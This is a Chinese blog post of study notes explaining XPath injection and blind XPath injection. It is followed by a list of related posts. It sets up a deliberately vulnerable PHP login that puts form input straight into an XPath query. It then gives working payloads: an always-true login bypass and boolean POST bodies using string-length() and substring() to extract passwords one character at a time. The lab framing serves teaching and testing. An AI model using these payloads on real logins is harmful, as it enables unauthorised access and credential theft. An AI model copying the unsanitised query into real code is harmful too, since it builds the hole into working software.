xpath注入与盲注

最新推荐文章于 2025-04-04 10:00:00 发布
最新推荐文章于 2025-04-04 10:00:00 发布
阅读量1.1k 收藏
点赞数
分类专栏: 暗月笔记 文章标签: php 数据库 服务器 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/RMC131/article/details/130251977
版权

xpath注入与盲注

XPath是一种查询语言,描述如何在XML文档中查找特定元素(包括属性、处理指令等),于SQL相似,Xpath可以引用XML文档的几乎任何部分,而不受访问控制限制。

XPath盲注可以从一个使用不安全方式嵌入用户信息的应用中提取数据,在输入未被过滤的情况下,攻击者可以提交并执行有效的XPath代码。这种攻击适用情况:攻击者不清楚XML文档的架构,或者错误消息被抑制,一次只能通过布尔化查询来获取部分信息,与SQL盲注相似。

测试

//xpath_user.xml

<?xml version="1.0" encoding="UTF-8"?>
<users>
<user id="1" username="admin" password="admin"></user>
<user id="2" username="root" password="admin"></user>
<user id="3" username="system" password="system"></user>
</users>

//xpath.php

<!DOCTYPE html>
<html>
        <head>
                <meta charset="UTF-8">
                <title></title>
        </head>
        <body>
                        <form method="POST">
                                用户名:<input type="text" name="username"><br>
                                密码:<input type="password" name="password"><br>
                                <input type="submit" value="登录" name="submit">
                        </form>
        </body>
</html>
<?php
if(file_exists('xpath_user.xml')){
        $xml=simplexml_load_file('xpath_user.xml');

        if($_POST['submit']){
                $username=$_POST['username'];
                $password=$_POST['password'];
                $sql="//user[@username='{$username}' and @password='{$password}']";
                $resulit = $xml->xpath($sql);
                if(count($resulit)==0){
                        echo '登录失败';
                }else{
                        echo "登录成功";
                }
        }
        }
?>

php件的用户登录使用的信息来自xml文件

$sql="//user[@username='{$username}' and @password='{$password}']";

select * from users where username='username' and password='password';
两个语句效果是相似的,实现的功能就是提取用户名和密码

方法

注入方法

万能密码: admin’ or ‘1’='1

x-www-from-urlencoded(raw): username=admin’ or ‘1’=‘1’ &password=xxxxxx&submit=submit

登陆成功

盲注方法

string-length()获取字符长度

substring 截取字符

注入语句(post data)

username=admin’and string-length(@password)=6 or ‘1’='1&password=0&submit=submit

获取长度,返回成功则表示长度正确

username=admin’and substring (@password,1,1)=‘a’ or ‘1’='1&password=0&submit=submit

尝试第一个字母是否为a,返回成功则表示字母正确,以此类推可以遍历出所有信息

【漏洞挖掘】——121、Xpath注入深入刨析
Fly_鹏程万里
06-28 284
XPath即为XML路径语言,是W3C XSLT标准的主要元素,它是一种用来确定XML(标准通用标记语言的子集)文档中某部分位置的语言。
XML相关的安全漏洞-XXE,XPATH小结(XXE注入XPATH注入
墨痕诉清风的博客
09-04 863
DTD来规定xml意味着,DTD申明的元素下面xml必须包含,并且只能含有DTD申明的元素,(#PCDATA)为可读取的字段, (name, from)表示还包含子节点,它是个根节点或者中间节点。那一行,表示执行第三行
XPath简介
weixin_34232617的博客
02-02 251
本文主要介绍代码注入攻击的一种特殊类型:XPath 。 如果您不熟悉 XPath 1.0 或需要了解基础知识,请查看 W3 Schools XPath 教程。您还可以在 developerWorks 上找到大量的关于在各种语言环境中使用 XPath 的文章。本文使用的示例主要针对 XPath 1.0,但是也可用于 XPath 2.0。XPath 2.0 实际上增加了您可能遇到...
XPath注入
发哥微课堂
06-29 2841
0x00:介绍 我们都知道数据库,以表的形式来存储数据。除了数据库还有一种方式即以文件形式存储,例如 xml 文件 txt 文件等。当然像文件存储数据一般很少用,文件存储有弊端,数据过多时,读写都很慢没有索引。一些配置性的东西可能会存到 xml 文件中。xml 存数据结构和 html 有点像,比如根结点、子节点、属性节点、文本等。 <?xml version="1.0" encodin...
【黑客技术零基础入门—打牢基础】一文搞懂XPath注入漏洞!
最新发布
Cairo_A的博客
04-04 835
XPath的作用就是用于在XML或HTML中查找信息,就像SQL语句的作用是在数据库中查询信息一样。建议没接触过的试着写写如下代码,亲身尝试一下xpath查询,理解的会更加深刻我这里对XPath的语法进行简单的举例:在XPath中,XML文档被作为节点树对待,XPath中有七种结点类型:元素、属性、文本、命名空间、处理指令、释以及文档节点(或成为根节点)。nodename:选取此节点的所有节点/:从根节点选取//:表示选取所有的子元素,不考虑其在文档的位置.:选取当前节点。
Xpath注入
不忘初心,护天下安全!
10-08 384
Xpath注入 Xpath定义 XPath注入攻击是指利用XPath解析器的松散输入和容错特性,能够在 URL、表单或其它信息上附带恶意的XPath 查询代码,以获得权限信息的访问权并更改这些信息。XPath注入攻击是针对Web服务应用新的攻击方法,它允许攻击者在事先不知道XPath查询相关知识的情况下,通过XPath查询得到一个XML文档的完整内容。 Xpath注入攻击原理 XPath注入攻击主...
Xpath注入攻击及其防御技术研究
weixin_34273046的博客
02-02 553
Xpath注入攻击及其防御技术研究 陆培军 (南通大学 计算机科学技术学院,江苏 南通226019)     摘 要 XML技术被广泛使用,XML数据的安全性越来越重要。本文简要介绍了XPath注入攻击XML数据的原理。在前人提出的防御通用方法的基础上,提出一个XPath 注入攻击通用检验模型,模型具有普遍意义。     关键词 XPath注入攻击; 防御技术; 模型 ...
xpath注入
dahe
05-07 1811
1.什么是xpath XPath 使用路径表达式在 XML 文档中进行导航 XPath 包含一个标准函数库 XPath 是 XSLT 中的主要元素 XPath 是一个 W3C 标准 2.学习xpath 在了解xpath注入之前,可以先学习一下语法和基础知识 https://www.runoob.com/xpath/xpath-syntax.html 3.xpath注入是什么 XPath 注入利用 XPath 解析器的松散输入和容错特性,能够在 URL、表单或其它信息上附带恶意的 XPath
102.网络安全渗透测试—[常规漏洞挖掘利用篇18]—[xpath注入注入]
qwsn
02-07 4583
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、xpath注入注入 1、什么是xpath注入 2、什么是xpath注入 3、xpath查询基本语句 二、xpath注入示例 1、注入漏洞页面源码:xpath.php 2、注入漏洞页面关键源码分析 3、账户信息存储文件:`xpath_user.xml` 4、注入方法 (1)万能密码登录: (2)payload分析: 5、注入 (1)获取字符长度函数:`string-length()` (2)截取字符函数:`su
xcat:XPath注入工具
05-02
XCat是一个命令行工具,可以利用和调查XPath漏洞。 有关完整的参考,请阅读此处的文档: : 它支持大量功能: 自动选择射(运行xcat injections以获得列表) 检测xpath解析器的版本和功能,并选择最快的...
xpath注入漏洞靶场搭建记录
墨痕诉清风的博客
01-23 430
这种漏洞允许攻击者注入恶意XPath代码,从而操纵应用程序对XML数据的处理方式。当应用程序使用用户提供的输入来查询XML数据时,如果这些输入没有经过适当的验证或清理,攻击者可以注入恶意XPath代码。这些代码可能在正常查询的上下文中执行,导致应用程序产生意外的结果或行为,类似于SQL注入。例如,假设一个应用程序使用用户提供的ID来检索XML数据。如果没有对ID进行适当的验证,攻击者可以注入类似于的XPath代码,从而获取所有具有管理员权限的用户的数据。
[NPUCTF2020]ezlogin (xpath)
记录学习,一起进步
03-26 1092
[NPUCTF2020]ezlogin (xpath)
XPath注入
fortoscer的博客
11-26 384
XPath是一种查询语言,描述如何找到特定元素(包括属性,处理指令等)的XML文档英寸 因为它是一个查询语言,XPath是有点类似于结构化查询语言(SQL),然而,XPath是不同的,因为它可以用来表示一个XML文档的几乎任何部分,而不受访问控制限制。在SQL中,“用户”(这是在XPath / XML环境不确定的术语)可以被限制在特定的数据库,表,列或查询。使用XPath注入攻击中,攻击者可以修改XPath查询来执行他选择的动作。
浅谈“XPATH 注入
→_→
05-12 530
漏洞名称: XPATH 注入 描述: XPath注入攻击是指利用XPath 解析器的松散输入和容错特性,能够在URL、表单或其它信息上附带恶意的XPath 查询代码,以获得权限信息的访问权并更改这些信息。XPath注入攻击是针对Web服务应用新的攻击方法,它允许攻击者在事先不知道XPath查询相关知 识的情况下,通过XPath查询得到一个XML文档的完整内容。 XPath 注入攻击利用两种技术,即 XPath 扫描和 XPath 查询布尔化。通过 该攻击,攻击者可以控制用来进行 XPath
php xpath注入工具,科普:XPATH注入
weixin_39926943的博客
04-07 431
用这个网站做示例Defaulthttp://91ri.org/ newsdetail.php?id=511http://91ri.org/ newsdetail.php?id=511.查看数据库版本?(ExtractValue)代码:Default+and+extractvalue(rand(),concat(0x7e,version()))--1+and+extractvalue(rand(),...
Xpath注入详解
Fly_鹏程万里
08-14 2212
0x01 什么是Xpath XPath即为XML路径语言,是W3C XSLT标准的主要元素,它是一种用来确定XML(标准通用标记语言的子集)文档中某部分位置的语言。它是一种用来在内存中导航整个XML树的语言,它的设计初衷是作为一种面向XSLT和XPointer的语言,后来独立成了一种W3C标准。 XPath基于XML的树状结构,有不同类型的节点,包括元素节点,属性节点和文本...
XPath 注入(仅供学习)
m0_62207482的博客
01-10 610
其中uid 和 pwd 变量未经任何检查和过滤,直接传递到查询语句中,上图中实际执行的 XPath 语 句 为 : //users/user[loginID/text()='999' and password/text()='999'] | * | user[@role='admin'] ,含义变成:选取 loginID=999 且 password=999 的用户 或者 选取 XML 所有节点 或者 选择 role 属性(如果有)为 admin 的用户。
XCat: 命令行XPath注入工具的功能使用
2. XPath漏洞:XPath漏洞是一种特殊的XPath注入漏洞,攻击者无法直接获取注入结果,但可以通过某些技术手段间接获取信息。 3. 自动选择射:这是XCat的一个功能,可以帮助用户自动选择最合适的注入方式,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

_JINJI_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值